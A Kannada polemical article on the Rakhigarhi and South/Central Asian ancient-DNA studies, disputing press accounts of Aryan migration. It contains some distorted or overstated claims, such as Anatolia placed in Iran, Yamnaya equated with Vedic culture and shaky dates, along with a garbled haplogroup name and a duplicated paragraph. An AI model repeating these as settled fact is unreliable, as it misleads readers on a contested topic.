ಹರಪ್ಪ ನಾಗರಿಕತೆ: ಪ್ರಾಚೀನ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ಹೇಳಿರುವುದೇನು?

ಸಂಶೋಧನೆಯ ಫಲಿತಾಂಶಗಳು ಮೊದಲಿನಿಂದಲೂ ವೈದಿಕಶಾಹಿ ಆಲೋಚನೆಗಳನ್ನು ಪ್ರತಿಪಾದಿಸುತ್ತಿದ್ದವರ ಹುಸಿ ಸಿದ್ಧಾಂತದ ಬುಡಕ್ಕೇ ಅಗ್ನಿಸ್ಪರ್ಶ ಮಾಡಿವೆ. ಈ ಕಾರಣದಿಂದಲೇ ಇವುಗಳನ್ನು ತಿರುಚಿ ಹೇಳುವ ಕೆಲಸ ಈಗಾಗಲೇ ಶುರುವಾಗಿದೆ.

ಈ ಶತಮಾನದ ಅತ್ಯಂತ ಮಹತ್ವದ ಸಂಶೋಧನೆಗಳಲ್ಲಿ ಒಂದು ಎನ್ನಬಹು+ದಾದ ಹರಪ್ಪ ನಾಗರಿಕತೆಗೆ ಸಂಬಂಧಿಸಿ ಜನರ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ಕೊನೆಗೂ ಅಧಿಕೃತವಾಗಿ ಹೊರಬಂದಿವೆ. ಕಳೆದ ಒಂದೆರಡು ವರ್ಷಗಳಿಂದಲೂ ಈ ಸಂಶೋಧನೆಗಳ ಕುರಿತು ಸಂವಾದ-ವಾಗ್ವಾದಗಳು ನಡೆಯುತ್ತಲೇ ಇದ್ದವು. ಅಂತಿಮವಾಗಿ ಕಳೆದ ಸೆಪ್ಟೆಂಬರ್ 5 ಮತ್ತು 6ರಂದು ಅಂತರರಾಷ್ಟ್ರೀಯ ಖ್ಯಾತಿಯ ಪ್ರತಿಷ್ಠಿತ ವಿಜ್ಞಾನ ಪತ್ರಿಕೆಗಳಾದ ಸೈನ್ಸ್ ಮತ್ತು ಸೆಲ್ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಈ ಪ್ರಾಚೀನ ಡಿಎನ್‍ಎ ಸಂಶೋಧನೆಯ ವರದಿಗಳು ಪ್ರಕಟವಾಗಿವೆ.

ಇದಾದ ಮಾರನೇ ದಿನ ದೆಹಲಿಯಲ್ಲಿ ಈ ಎರಡೂ ಸಂಶೋಧನೆಗಳಲ್ಲಿ ಪಾಲ್ಗೊಂಡಿರುವ ಪ್ರೊ.ವಸಂತ್ ಶಿವರಾಮ್ ಶಿಂಧೆ ಮತ್ತು ನೀರಜ್ ರಾಯ್ ಪತ್ರಿಕಾಗೋಷ್ಠಿಗಳನ್ನೂ ನಡೆಸಿದ್ದಾರೆ. ವಿಪರ್ಯಾಸದ ಸಂಗತಿ ಎಂದರೆ ಸಂಶೋಧನೆಗಳ ವರದಿಗಳಲ್ಲಿ ಏನಿದೆಯೋ ಅದಕ್ಕೆ ವಿರುದ್ಧವಾದ ವರದಿಗಳು ಹಲವು ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟಗೊಂಡಿವೆ. ಈ ಕಾರಣದಿಂದ ಬಹಳಷ್ಟು ಜನರಿಗೆ ನಿಜವಾಗಿಯೂ ಈ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ಏನು ಹೇಳಿವೆ ಎಂಬುದು ತಿಳಿಯದೇ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಬಂದ ತಪ್ಪು ಮಾಹಿತಿಗಳನ್ನೇ ನಿಜ ಎಂದು ನಂಬಿಕೊಳ್ಳುವಂತಾಗಿದೆ. ಪರಿಸ್ಥಿತಿ ಹೀಗೆ ಉಂಟಾಗಲು ಕಾರಣ ಸಂಶೋಧನಾ ವರದಿಗಳನ್ನು ಓದದೆಯೇ ಕೇವಲ ಪತ್ರಿಕಾ ಗೋಷ್ಠಿಗಳಲ್ಲಿ ಹೇಳಿದ್ದನ್ನು ತಮ್ಮ ಮೂಗಿನ ನೇರಕ್ಕೆ ವರದಿ ಮಾಡಿದ ಪತ್ರಕರ್ತರು ಒಂದು ಕಾರಣವಾದರೆ ಸ್ವತಃ ಶಿಂಧೆ ಮತ್ತು ರಾಯ್ ಅವರೂ ವಾಸ್ತವಾಂಶಗಳನ್ನು ನೇರವಾಗಿ ಸ್ಪಷ್ಟವಾಗಿ ಹೇಳದೇ, ಸಂಶೋಧನೆಗೆ ಹೊರತಾದ ವಿಷಯ ಹೇಳಿರುವುದು ಮತ್ತೊಂದು ಕಾರಣ. ಇವುಗಳ ಸತ್ಯಾಸತ್ಯತೆ ಏನೆಂದು ತಿಳಿಯಲು ನಾವು ವಿಜ್ಞಾನಿಗಳ ವರದಿಗಳು ಏನು ಹೇಳಿವೆ ಎಂಬುದನ್ನು ತಿಳಿದುಕೊಳ್ಳುವ ಅಗತ್ಯವಿದೆ.

2000ನೇ ಇಸವಿಯಲ್ಲಿ ಜೆನೆಟಿಕ್ ಸಂಶೋಧನೆಗಳು ಮೊದಲ ಬಾರಿಗೆ ಮನುಷ್ಯನ ವಂಶವಾಹಿ ನಕ್ಷೆಯನ್ನು ಸಿದ್ಧಪಡಿಸಿದವು. ಹ್ಯೂಮನ್ ಜಿನೋಮ್ ಪ್ರಾಜೆಕ್ಟ್ ಎಂದು ಅದಕ್ಕೆ ಕರೆಯಲಾಗಿತ್ತು. ಇದಾದ ನಂತರ 2005ನೇ ಇಸವಿಯ ನಂತರದಲ್ಲಿ ನಡೆದ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ಮನುಕುಲದ ಪ್ರಾಚೀನ ಇತಿಹಾಸವನ್ನು ಡಿಎನ್‍ಗಳ ಸಂಶೋಧನೆ, ವಿಶ್ಲೇಷಣೆಯ (ಡಿಎನ್‍ಎ ಸೀಕ್ವೆನ್ಸಿಂಗ್) ಮೂಲಕ ದಾಖಲಿಸುವ ಕೆಲಸ ಮಾಡುತ್ತಾ ಬಂದಿವೆ.

ಮನುಷ್ಯನೊಬ್ಬನ ಜೀವಕೋಶದೊಳಗಿನ ಕ್ರೋಮೋಸೋಮುಗಳಲ್ಲಿರುವ ಒಂದು ಡಿಎನ್‍ಎಯ ಒಳಗೆ ಆ ವ್ಯಕ್ತಿಯ ಸಹಸ್ರಾರು ತಲೆಮಾರುಗಳ ವಂಶಾವಳಿಯ ಮಾಹಿತಿ ಅಡಗಿರುತ್ತದೆ. ಪ್ರಪಂಚದ ಎಲ್ಲಾ ಸಮುದಾಯಗಳಿಗೆ ಸೇರಿದ ಜನರ ವಂಶವಾಹಿಗಳಲ್ಲಿ ಅಡಗಿರುವ ಇತಿಹಾಸ ವಿಶ್ಲೇಷಿಸಿದರೆ ಯಾವ ಸಮುದಾಯ ಎಷ್ಟು ಶತಮಾನ ಮತ್ತು ಸಹಸ್ರಮಾನಗಳ ಹಿಂದೆ ಎಲ್ಲಿ ವಾಸವಾಗಿತ್ತು ಎಂಬ ಸಂಗತಿಯನ್ನು ಕರಾರುವಾಕ್ಕಾಗಿ ಹೇಳಬಹುದು ಎನ್ನುವುದೇ ಇಂತಹ ಮಹತ್ವಾಕಾಂಕ್ಷೆಯ ಕೆಲಸಕ್ಕೆ ಜೆನೆಟಿಕ್ ವಿಜ್ಞಾನಿಗಳು ಕೈಹಾಕಲು ಕಾರಣವಾಗಿತ್ತು. ಅದರಂತೆ ಇಂದು ಇಡೀ ಪ್ರಪಂಚದ ಬಹುತೇಕ ಪ್ರಾಚೀನ ಜನಸಮುದಾಯಗಳ ವಂಶಾವಳಿ ನಕ್ಷೆಗಳನ್ನು, ಆ ಸಮುದಾಯಗಳು ನಡೆಸಿರುವ ವಲಸೆಗಳ ಇತಿಹಾಸವನ್ನು, ವಲಸೆ ನಕ್ಷೆಗಳನ್ನು ಡಿಎನ್‍ಎ ವಿಶ್ಲೇಶಣೆಯ ಮೂಲಕ ವಿಜ್ಞಾನಿಗಳು ಮಾಡಿದ್ದಾರೆ.

ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿಯೇ ಜಗತ್ತಿನ ನಾಗರಿಕತೆಗಳಲ್ಲಿ ಅತ್ಯಂತ ಪ್ರಾಚೀನವೂ, ಅತಿ ದೊಡ್ಡ ನಾಗರಿಕತೆಯೂ ಆಗಿದ್ದ ಹರಪ್ಪ ಅಥವಾ ಸಿಂಧೂ ನದಿ ನಾಗರಿಕತೆಯ ಕುರಿತು ಸಹ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ನಡೆದಿವೆ. ಇದಕ್ಕೂ ಮೊದಲು ಇಡೀ ಭಾರತದ ಬಹುತೇಕ ಜನಸಮುದಾಯಗಳ ವಂಶವಾಹಿ ನಕ್ಷೆಗಳನ್ನು ಸಹ 2008ರ ಸುಮಾರಿಗೆ ವಿಜ್ಞಾನಿಗಳು ಸಿದ್ಧಪಡಿಸಿದ್ದರು. ಇದೇ ಹೊತ್ತಿಗೆ 2015ರಲ್ಲಿ ಹರ್ಯಾಣದ ಹಿಸ್ಸಾರ್ ಜಿಲ್ಲೆಯ ರಾಖಿಗಡಿ ಎಂಬಲ್ಲಿ 4600 ವರ್ಷಗಳಷ್ಟು ಹಿಂದೆ ಬದುಕಿದ್ದ ಮಹಿಳೆಯ ಅಸ್ಥಿಪಂಜರವೊಂದು ಉತ್ಖನನದಲ್ಲಿ ದೊರಕಿತ್ತು. ರಾಖಿಗಡಿಯು ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಒಂದು ಮುಖ್ಯ ನಗರವಾಗಿತ್ತು. ಆ ಪಳೆಯುಳಿಕೆಯ ಕಿವಿಯ ಮೂಳೆಗಳಿಂದ ವಂಶವಾಹಿಗಳನ್ನು ಸಂಗ್ರಹಿಸಲು ಸಂಶೋಧಕರಿಗೆ ಸಾಧ್ಯವಾಗಿತ್ತು. ಮೊನ್ನೆ ವಿಜ್ಞಾನಿಗಳು ಬಿಡುಗಡೆ ಮಾಡಿರುವ ಎರಡು ವರದಿಳ ಪೈಕಿ ಒಂದರಲ್ಲಿ ಈ ರಾಖಿಗಡಿ ಮಹಿಳೆಯ ವಂಶವಾಹಿಯ ವಿಶ್ಲೇಷಣೆಯನ್ನೂ ಒಳಗೊಂಡಿದೆ.

ಈ ರಾಖಿಗಡಿಯಲ್ಲಿ ವಂಶವಾಹಿಯ ವಿಶ್ಲೇಷಣೆಗೆ ಭಾರತ ಮತ್ತು ವಿದೇಶಗಳ 28 ಪರಿಣತ ವಿಜ್ಞಾನಿಗಳು ಕೆಲಸ ಮಾಡಿದ್ದಾರೆ. ಹಾಗೆಯೇ ‘ಸೈನ್ಸ್’ ಪತ್ರಿಕೆಯಲ್ಲಿ ಪ್ರಕಟವಾದ ಮತ್ತೊಂದು ವರದಿ ದಕ್ಷಿಣ ಮತ್ತು ಮಧ್ಯ ಏಷಿಯಾಗಳಲ್ಲಿ ಜನಸಮೂಹಗಳು ಹೇಗೆ ರಚನೆಗೊಂಡವು ಎಂಬ ಬಗೆಗಿನ ಸಂಶೋಧನೆಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಇದರ ಸಂಶೋಧನೆ-ವಿಶ್ಲೇಷಣೆಯಲ್ಲಿ ಅಂತರರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ 117 ವಿಜ್ಞಾನಿಗಳು, ಪರಿಣತರು ಪಾಲ್ಗೊಂಡಿದ್ದಾರೆ.

ಮಧ್ಯ ಏಷಿಯಾದ ಇರಾನ್, ತುರಾನ್, ಯೂರೇಶಿಯಾ, ದಕ್ಷಿಣ ಏಷಿಯದ ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಪ್ರದೇಶದ ವ್ಯಾಪ್ತಿಯವರೆಗೆ ದೊರೆತ 523 ಪ್ರಾಚೀನ ವಂಶವಾಹಿಗಳ ವಂಶಾವಳಿಯನ್ನು ಇದರಲ್ಲಿ ಶೋಧಿಸಿದ್ದಾರೆ. ಈ 523ರಲ್ಲಿ ಹರಪ್ಪ ನಾಗರಿಕತೆಗೆ ಸಂಬಂಧಿಸಿದ ಇನ್ನೂ 11 ಜನರ (ಇಂದಿನ ತುರ್ಕ್ ಮೆನಿಸ್ತಾನದ ಗೋನೂರಿನ 3 ಮತ್ತು ಪೂರ್ವ ಇರಾನಿನ ಶೆಹ್ರ್ -ಇ-ಶೋಕ್ತಾದ 8) ವಂಶವಾಹಿಗಳು ದೊರಕಿದ್ದು ಅವುಗಳನ್ನು ಸಹ ಆಳವಾದ ಅಧ್ಯಯನಕ್ಕೆ ಜ್ಞಾನಿಗಳು ಒಳಪಡಿಸಿದ್ದಾರೆ. ಅಂದರೆ ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಒಟ್ಟು 12 ಪ್ರಾಚೀನ ಡಿಎನ್‍ಎ ವಿಶ್ಲೇಷಣೆ ನಡೆಸಲಾಗಿದೆ. ಹೀಗಾಗಿ ಪ್ರಕಟವಾಗಿರುವ ಎರಡೂ ವರದಿಗಳು ಒಂದಕ್ಕೊಂದು ಪೂರಕವಾಗಿವೆ ಎಂಬುದನ್ನು ನಾವು ಗಮನಿಸಬಹುದು.

ಸಂಶೋಧನೆಯ ವರದಿಗಳಲ್ಲಿ ಏನಿದೆ?

ನಮ್ಮ ಪತ್ರಿಕಾ ವರದಿಗಳು ವಿಜ್ಞಾನಿಗಳ ವರದಿಯನ್ನು ತಪ್ಪಾಗಿ ಉಲ್ಲೇಖಿಸುತ್ತಾ, ‘ವಂಶವಾಹಿ ಸಂಶೋಧನೆಯಲ್ಲಿ ಭಾರತಕ್ಕೆ ಆರ್ಯರ ವಲಸೆ ಸುಳ್ಳು ಎಂದು ಸಾಬೀತಾಗಿದೆ’, ‘ಆರ್ಯರೇ ಹರಪ್ಪ ನಾಗರಿಕತೆ ಕಟ್ಟಿದವರು’, ‘ಭಾರತದಿಂದ ಹೊರಕ್ಕೆ ವಲಸೆ ನಡೆದಿದೆಯೇ ಹೊರತು ಹೊರಗಿನಿಂದ ಭಾರತಕ್ಕೆ ವಲಸೆ ನಡೆದಿಲ್ಲ’ ಎಂಬಂತಹ ಹಸಿಹಸಿ ಸುಳ್ಳುಗಳು ಪ್ರಕಟವಾದವು. ಆದರೆ ವಿಜ್ಞಾನ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟವಾಗಿರುವ ಸತ್ಯಾಂಶಗಳು ಈ ದಿನಪತ್ರಿಕೆಗಳ ಹೇಳಿಕೆಗಳಿಗೆ ತದ್ವಿರುದ್ಧವಾಗಿರುವುದನ್ನು ನೋಡಬಹುದು. ಈ ಸಂಶೋಧನಾ ವರದಿಗಳ ಪೈಕಿ ರಾಖಿಗಡಿ ಡಿಎನ್‍ಎ ಸಂಶೋಧನೆ ಕುರಿತ ವಿಜ್ಞಾನಿಗಳ ವರದಿಯ ಶೀರ್ಷಿಕೆಯೇ ‘ಪ್ರಾಚೀನ ಹರಪ್ಪನ್ ವಂಶವಾಹಿಯು ಸ್ಟೆಪ್ಪ್ ಪಶುಪಾಲಕ ಜನರ ಅಥವಾ ಇರಾನಿನ ಕೃಷಿಕರ ವಂಶಾವಳಿಯನ್ನು ಹೊಂದಿಲ್ಲ’ ಎಂಬುದಾಗಿದೆ. ಮತ್ತೊಂದು ಸಂಶೋಧನೆಯ ಶೀರ್ಷಿಕೆ ‘ದಕ್ಷಿಣ ಮತ್ತು ಮಧ್ಯ ಏಷಿಯಾಗಳಲ್ಲಿ ಮಾನವ ಸಮೂಹಗಳು ರೂಪುಗೊಂಡ ಬಗೆ’ ಎಂಬುದಾಗಿದೆ. ಈ ಎರಡೂ ವರದಿಗಳು ಸಾರಾಂಶದಲ್ಲಿ ಕೆಲವು ಸ್ಪಷ್ಟ ಸಂಗತಿಗಳನ್ನು ಮುಂದಿಟ್ಟಿವೆ.

ಸಂಶೋಧಕರ ತಂಡ

ಈ ವಂಶವಾಹಿ ಸಂಶೋಧನೆಯಲ್ಲಿ ಪ್ರಮುಖ ಪಾತ್ರ ವಹಿಸಿದ್ದು ಅಮೆರಿಕದಲ್ಲಿರುವ ತಳಿವಿಜ್ಞಾನಿ ಡೇವಿಡ್ ರೀಚ್ ಅವರ ಸುಸಜ್ಜಿತ ಪ್ರಯೋಗಾಲಯ. ಪ್ರಿಯಾ ಮೂರ್ಜಾನಿ, ವಾಗೀಶ್ ನರಸಿಂಹನ್, ನಿಕ್ ಪ್ಯಾಟರ್ಸನ್‍ರಂತಹ ಸಂಶೋಧನಾ ಬದ್ಧತೆ ಇರುವ ನೂರಾರು ಅಂತರರಾಷ್ಟ್ರೀಯ ಖ್ಯಾತಿಯ ವಿಜ್ಞಾನಿಗಳ ಶ್ರಮದಿಂದಾಗಿ ಇದು ಸಾಧ್ಯವಾಗಿದೆ. ಒಂದು ಶತಮಾನದ ಹಿಂದೆ ಹರಪ್ಪ ನಾಗರಿಕತೆಯನ್ನು ಕಂಡು ಹಿಡಿದ ದಿನಗಳಿಂದಲೂ ಒಗಟಾಗಿ ಉಳಿದಿದ್ದ ಹಲವು ಪ್ರಶ್ನೆಗಳಿಗೆ ಇಂದು ಕರಾರುವಾಕ್ಕಾದ ಉತ್ತರಗಳು ದೊರಕಿದಂತಾಗಿದೆ.

ಆದರೆ ಈ ಉತ್ತರಗಳಿಂದ ಪಟ್ಟಭದ್ರ ಹಿತಾಸಕ್ತಿಗಳು ತೀರಾ ಕಸಿವಿಸಿಗೆ ಒಳಗಾಗಿರುವುದು ಮೇಲ್ನೋಟಕ್ಕೇ ಕಾಣುತ್ತಿವೆ.

• ಸಿಂಧೂ ನದಿ ನಾಗರಿಕತೆಯನ್ನು ಕಟ್ಟಿದ ಜನರು ದಕ್ಷಿಣ ಏಷಿಯನ್ನರು.

• ಸಿಂಧೂ ನಾಗರಿಕತೆಯ ಜನರ ವಂಶಾವಳಿಗಳಲ್ಲಿ ಯೂರೇಶಿಯಾದ ಕಕೇಶಿಯನ್ ಸ್ಟೆಪ್ ಪಶುಪಾಲಕ ಜನರ ಖ1ಚಿ ಹ್ಯಾಪ್ಲೋಗ್ರೂಪಿನ ವಂಶಾವಳಿ ಪತ್ತೆಯಾಗಿಲ್ಲ. ಅಂದರೆ ಅದರ ಅರ್ಥವೇನೆಂದರೆ ಋಗ್ವೇದಿ ಆರ್ಯರು ಅರ್ಥಾತ್ ಸ್ಟೆಪ್ ಪಶುಪಾಲಕರಿಗೆ ಹೊರತಾದ ದಕ್ಷಿಣ ಏಷಿಯನ್ನರು ಸಿಂಧೂ ನಾಗರಿಕತೆಯನ್ನು ಕಟ್ಟಿದವರು.

• ಸಿಂಧೂ ನಾಗರಿಕತೆಯ ಅವಸಾನದ ಕಾಲದಲ್ಲಿ ಅಂದರೆ ಸರಿಯಾಗಿ ಕ್ರಿ.ಪೂ. 2000 ದಿಂದ ಕ್ರಿ.ಪೂ.1500 ನಡುವಿನ ಕಾಲಾವಧಿಯಲ್ಲಿ ಸ್ಟೆಪ್ ಮೂಲದ ಆರ್ಯರು ಭಾರತಕ್ಕೆ ವಲಸೆ ಬಂದಿದ್ದರು. ಇವರು ತಮ್ಮೊಂದಿಗೆ ಇಂಡೋ-ಯೂರೋಪಿಯನ್ ಭಾಷೆಗಳನ್ನು (ಅಂದರೆ ಸಂಸ್ಕøತವನ್ನು ಒಳಗೊಂಡಂತೆ ಇತರೆ ಇಂಡೋ-ಆರ್ಯನ್ ಭಾಷೆಗಳು) ತಂದರು. ಮಧ್ಯ ಏಷಿಯಾದಿಂದ ಹೊರಟಿದ್ದ ಸ್ಟೆಪ್ ಆರ್ಯರ ವಂಶಾವಳಿಯು ಕಾಕಸಸ್ ಪರ್ವತ ಪ್ರದೇಶಗಳಲ್ಲಿ ರೂಪುಗೊಂಡ ಯಾಮ್ನಾಯಾ ಸಂಸ್ಕøತಿಯನ್ನು (ವೈದಿಕ ಸಂಸ್ಕøತಿಯನ್ನು) ತಮ್ಮೊಂದಿಗೆ ಪಶ್ಚಿಮದ ಯೂರೋಪ್ ಖಂಡಕ್ಕೂ ಪೂರ್ವದ ದಕ್ಷಿಣ ಏಷಿಯಾಕ್ಕೂ ಹರಡಿದೆ.

• ಸಿಂಧೂ ನಾಗರಿಕತೆ ಕಟ್ಟಿದ ದಕ್ಷಿಣ ಏಷಿಯನ್ನರು ಭಾರತ ಉಪಖಂಡದಲ್ಲಿ ಹಲವಾರು ಸಾವಿರ ವರ್ಷಗಳ ಮುಂಚೆಯೇ ನೆಲೆಗೊಂಡಿದ್ದ ಇನ್ನಿತರ ಎರಡು ವಲಸೆ ಸಮುದಾಯಗಳ ಜನ. ಇವರಲ್ಲಿ 65,000 ವರ್ಷಗಳ ಹಿಂದೆ ಆಫ್ರಿಕಾದಿಂದ ಅರಬ್ಬೀ ಸಮುದ್ರದ ಕರಾವಳಿಯ ಮೂಲಕ ಭಾರತಕ್ಕೆ ಬಂದ ಮೊದಲ ಇಂಡಿಯನ್ನರು (ಇವರ ನೇರ ವಂಶಸ್ಥರು ಇಂದಿನ ಲಿಟಲ್ ಅಂಡಮಾನ್ ದ್ವೀಪದಲ್ಲಿರುವ ಓಂಗೇ ಬುಡಕಟ್ಟಿನ ಜನರು) ಒಂದು ಗುಂಪಾದರೆ, ಸುಮಾರು 8000 ವರ್ಷಗಳ ಹಿಂದೆ ಹರಪ್ಪ ಪ್ರದೇಶಕ್ಕೆ ಇರಾನ್ ಕಡೆಯಿಂದ ವಲಸೆ ಬಂದ ಬೇಟೆಗಾರ-ಸಂಗ್ರಾಹಕ ಬುಡಕಟ್ಟುಗಳು ಮತ್ತೊಂದು ಗುಂಪು. ಈ ಎರಡೂ ಗುಂಪುಗಳು ಕಲೆತು, ಬೆರೆತು, ಒಂದು ಸಮುದಾಯವಾಗಿ ಕೆಲವು ಸಾವಿರ ವರ್ಷಗಳ ಕಾಲ ಒಂದೆಡೆ ನೆಲೆಸಿದ್ದರು. ಈ ದಕ್ಷಿಣ ಏಷಿಯನ್ನರೇ ಸು.7000 ವರ್ಷಗಳ ಹಿಂದೆ ಹರಪ್ಪ ನಾಗರಿಕತೆಯನ್ನು ಕಟ್ಟಿ ಬೆಳೆಸಿದ್ದರು.

ಹರಪ್ಪ ಜನರಿಂದ ಉಂಟಾದ ಈ ಪೂರ್ವಿಕ ದಕ್ಷಿಣ ಭಾರತೀಯರೇ ತಮಿಳು, ಕನ್ನಡ, ತೆಲುಗು, ತುಳು, ಕೊರಗ, ಜೇನುನುಡಿ, ಮಲಯಾಳಂ ಮೊದಲಾದ 26 ದ್ರಾವಿಡ ಭಾಷೆಗಳನ್ನು ದಕ್ಷಿಣ ಭಾರತದಲ್ಲಿ ಹರಡಿದರು. ಇದುವರೆಗೆ ಓದಲು ಸಾಧ್ಯವಾಗಿರದ ಸಿಂಧೂ ಲಿಪಿಯು ಈ ದ್ರಾವಿಡ ಭಾಷೆಗಳ ಮೂಲ ಭಾಷೆಯಾಗಿರುವ ಎಲ್ಲಾ ಸಾಧ್ಯತೆಗಳಿವೆ. ಈ ಕುರಿತು ಹೆಚ್ಚಿನ ಭಾಷಾ ಸಂಶೋಧನೆಗಳು ಖಚಿತ ತಿಳಿವಳಿಕೆ ನೀಡಬಹುದು.

• ದಕ್ಷಿಣ ಏಷಿಯದಲ್ಲಿ ಕೃಷಿಯನ್ನು ಕಂಡುಹಿಡಿದು, ಪಶು ಸಾಕಣೆ ಅಭಿವೃದ್ಧಿಪಡಿಸಿದವರೂ ಇವರೇ. ಇರಾನಿನ ಅನತೋಲಿಯದಲ್ಲಿ ಕೃಷಿ ಕಂಡು ಹಿಡಿದ ಇರಾನಿನ ಮೊದಲ ಕೃಷಿಕರಿಗೂ ಹರಪ್ಪನ್ನರಿಗೂ ಸಂಬಂಧವಿರಲಿಲ್ಲ. ಹೀಗಾಗಿ ಹರಪ್ಪ ನಾಗರಿಕತೆ ಕಟ್ಟಿದ ದಕ್ಷಿಣ ಏಷಿಯನ್ನರು ಆರ್ಯರಿಗಾಗಲೀ, ಇರಾನಿ ಕೃಷಿಕರಿಗಾಗಲೀ ಸಂಬಂಧವೇ ಇರದ ಮೂಲ ಭಾರತೀಯ ಸಮುದಾಯಗಳಾಗಿದ್ದರು.

• ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಅವಸಾನದ ನಂತರ ಸಿಂಧೂ ಕಣಿವೆಯಲ್ಲಿ ಆರ್ಯರು ನೆಲೆಗೊಳ್ಳುತ್ತಿದ್ದಂತೆ ಹರಪ್ಪದ ಜನರು ದಕ್ಷಿಣ ಭಾರತ ಮತ್ತು ಪೂರ್ವ ಭಾರತದ ಕಡೆಗೆ ತೆರಳಿದರು. ನಂತರದ ಕಾಲದಲ್ಲಿ ಉತ್ತರ ಭಾರತದಲ್ಲಿ ಸ್ಟೆಪ್ ಮೂಲದ ಆರ್ಯರೊಂದಿಗೆ ಕೆಲವು ಹರಪ್ಪನ್ನರು ಸಂಕರಗೊಂಡರು. ಈ ಮೂಲಕ ಇಂಡೋ ಯೂರೋಪಿಯನ್ ಭಾಷೆಗಳನ್ನಾಡುವ ಪೂರ್ವಿಕ ಉತ್ತರ ಭಾರತೀಯ (Ancestral North Indians- ANI) ವಂಶಾವಳಿ ರೂಪುಗೊಂಡಿತು. ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಒಂದು ವಿಭಾಗ ಭಾರತದ ದಕ್ಷಿಣಕ್ಕೆ ಚಲಿಸಿ ಮೊದಲಿಂದಲೂ ಇಲ್ಲಿಯೇ ಇದ್ದ ಆದಿಮ ಪೂರ್ವಿಕ ದಕ್ಷಿಣ ಭಾರತೀಯರೊಂದಿಗೆ  (Ancient Ancestral South Indians- AASI) ಸೇರಿಕೊಂಡು ಪೂರ್ವಿಕ ದಕ್ಷಿಣ ಭಾರತೀಯ (Ancestral South Indians- ASI) ವಂಶಾವಳಿ ರೂಪುಗೊಂಡಿತು (65,000 ವರ್ಷಗಳಿಂದ ದಕ್ಷಿಣ ಭಾರತದ ಬೇರೆ ಬೇರೆ ಕಡೆ ಹರಡಿಕೊಂಡಿದ್ದ ಬುಡಕಟ್ಟುಗಳು). ಹರಪ್ಪ ಜನರಿಂದ ಉಂಟಾದ ಈ ಪೂರ್ವಿಕ ದಕ್ಷಿಣ ಭಾರತೀಯರೇ ತಮಿಳು, ಕನ್ನಡ, ತೆಲುಗು, ತುಳು, ಕೊರಗ, ಜೇನುನುಡಿ, ಮಲಯಾಳಂ ಮೊದಲಾದ 26 ದ್ರಾವಿಡ ಭಾಷೆಗಳನ್ನು ದಕ್ಷಿಣ ಭಾರತದಲ್ಲಿ ಹರಡಿದರು. ಇದುವರೆಗೆ ಓದಲು ಸಾಧ್ಯವಾಗಿರದ ಸಿಂಧೂ ಲಿಪಿಯು ಈ ದ್ರಾವಿಡ ಭಾಷೆಗಳ ಮೂಲ ಭಾಷೆಯಾಗಿರುವ ಎಲ್ಲಾ ಸಾಧ್ಯತೆಗಳಿವೆ. ಈ ಕುರಿತು ಹೆಚ್ಚಿನ ಭಾಷಾ ಸಂಶೋಧನೆಗಳು ಖಚಿತ ತಿಳಿವಳಿಕೆ ನೀಡಬಹುದು. ಮೂಲ ಹರಪ್ಪನ್ನರ ವಂಶಾವಳಿಗಳು ಇಂದಿನ ದಕ್ಷಿಣ ಭಾರತದ ಆದಿವಾಸಿ ಬುಡಕಟ್ಟು ಸಮುದಾಯಗಳಲ್ಲಿ ಹೆಚ್ಚಿನ ಮಟ್ಟದಲ್ಲಿ ಇವೆ.

ಈ ಸಂಶೋಧನಾ ವರದಿಗಳು ಸ್ಪಷ್ಟ ಹಾಗೂ ಖಚಿತ ಮಾತುಗಳಲ್ಲಿ ಮೇಲಿನ ಸಂಗತಿಗಳನ್ನು ತಿಳಿಸಿವೆ. ಆದರೂ ಇವಕ್ಕೆ ವ್ಯತಿರಿಕ್ತ ಸುದ್ದಿಗಳನ್ನು ಹರಿಬಿಡಲಾಗುತ್ತಿದೆ ಎಂದರೆ ಅದು ವೈಜ್ಞಾನಿಕ ಸಂಶೋಧನೆಗಳಿಗೆ ಮಾಡುವ ಅಪಮಾನವೇ ಆಗಿದೆ.

ಕೆಲವು ಪತ್ರಿಕೆಗಳು ವಿಜ್ಞಾನಿಗಳ ವರದಿಯಲ್ಲಿ ಹೇಳಿದ ಸ್ಟೆಪ್ ಪಶುಪಾಲಕರೇ ಬೇರೆ ಆರ್ಯರೇ ಬೇರೆ, ವೈದಿಕರೇ ಬೇರೆ ಎಂದು ನಂಬಿಸಲು ಪ್ರಯತ್ನಿಸಿದವು. ಆದರೆ ಒಂದು ಸಂಗತಿಯನ್ನು ನಾವು ಗಮನಿಸಬಹುದು. ಇಂದು ಇರುವ ಭಾರತೀಯ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಸುಮಾರು ಶೇಕಡಾ 30ರಷ್ಟು ಜನರಲ್ಲಿ ಸ್ಟೆಪ್ ಮೂಲದ ಆರ್ಯರ ಖ1ಚಿ ಹ್ಯಾಪ್ಲೋಗ್ರೂಪ್ ಇರುವುದನ್ನು ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ದೃಢಪಡಿಸಿವೆ. ಅಪ್ಪನಿಂದ ಮಗನಿಗೆ ಬರುವ ವೈ ಕ್ರೋಮೋಸೋಮುಗಳ ಡಿಎನ್‍ಎ ವಿಶ್ಲೇಷಣೆಯ ಮೂಲಕ ಇದು ತಿಳಿದುಬಂದಿದೆ. ಮಾತ್ರವಲ್ಲದೇ ಇಂದು ಭಾರತದಲ್ಲಿರುವ ಉನ್ನತ ಜಾತಿಗಳಲ್ಲಿ, ಬ್ರಾಹ್ಮಣರಲ್ಲಿ ಈ ಸ್ಟೆಪ್ ಮೂಲದ ವಂಶಾವಳಿ 